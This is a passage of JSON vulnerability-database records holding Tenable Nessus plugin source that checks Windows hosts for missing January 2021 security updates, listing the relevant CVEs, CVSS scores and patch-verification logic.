(CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1692", "CVE-2021-1637", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598275.NASL", "href": "https://www.tenable.com/plugins/nessus/144888", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144888);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1688\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598285\");\n script_xref(name:\"MSKB\", value:\"4598275\");\n script_xref(name:\"MSFT\", value:\"MS21-4598285\");\n script_xref(name:\"MSFT\", value:\"MS21-4598275\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598285/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598275/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598275 or Cumulative Update KB4598285.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598275',\n '4598285'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598275, 4598285])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:45:31", "description": "The remote Windows host is missing security update 4598287\nor cumulative update 4598288. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)", "edition": 4, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598287: Windows Server 2008 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1699", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598287.NASL", "href": "https://www.tenable.com/plugins/nessus/144878", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# 
extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144878);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/20\");\n\n script_cve_id(\n \"CVE-2021-1649\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\"\n );\n script_xref(name:\"MSKB\", value:\"4598287\");\n script_xref(name:\"MSKB\", value:\"4598288\");\n script_xref(name:\"MSFT\", value:\"MS21-4598287\");\n script_xref(name:\"MSFT\", value:\"MS21-4598288\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598287: Windows Server 2008 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598287\nor cumulative update 4598288. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1678)\n\n - An information disclosure vulnerability. 
An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\");\n # https://support.microsoft.com/en-us/help/4598287/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71567e2d\");\n # https://support.microsoft.com/en-us/help/4598288/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9cddaa00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598287 or Cumulative Update KB4598288.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1706\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598287', '4598288');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598287, 4598288])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 
hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:53:37", "description": "The remote Windows host is missing security update 4598289\nor cumulative update 4598279. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-1679)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598289: Windows 7 and Windows Server 2008 R2 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598279.NASL", "href": "https://www.tenable.com/plugins/nessus/144877", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144877);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2021-1649\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\"\n );\n script_xref(name:\"MSKB\", value:\"4598279\");\n script_xref(name:\"MSKB\", value:\"4598289\");\n script_xref(name:\"MSFT\", value:\"MS21-4598279\");\n script_xref(name:\"MSFT\", value:\"MS21-4598289\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598289: Windows 7 and Windows Server 2008 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598289\nor cumulative update 4598279. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-1679)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598279/windows-7-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598289/windows-7-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598289 or Cumulative Update KB4598279.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598279',\n '4598289'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598279, 4598289])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:49", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. 
(CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 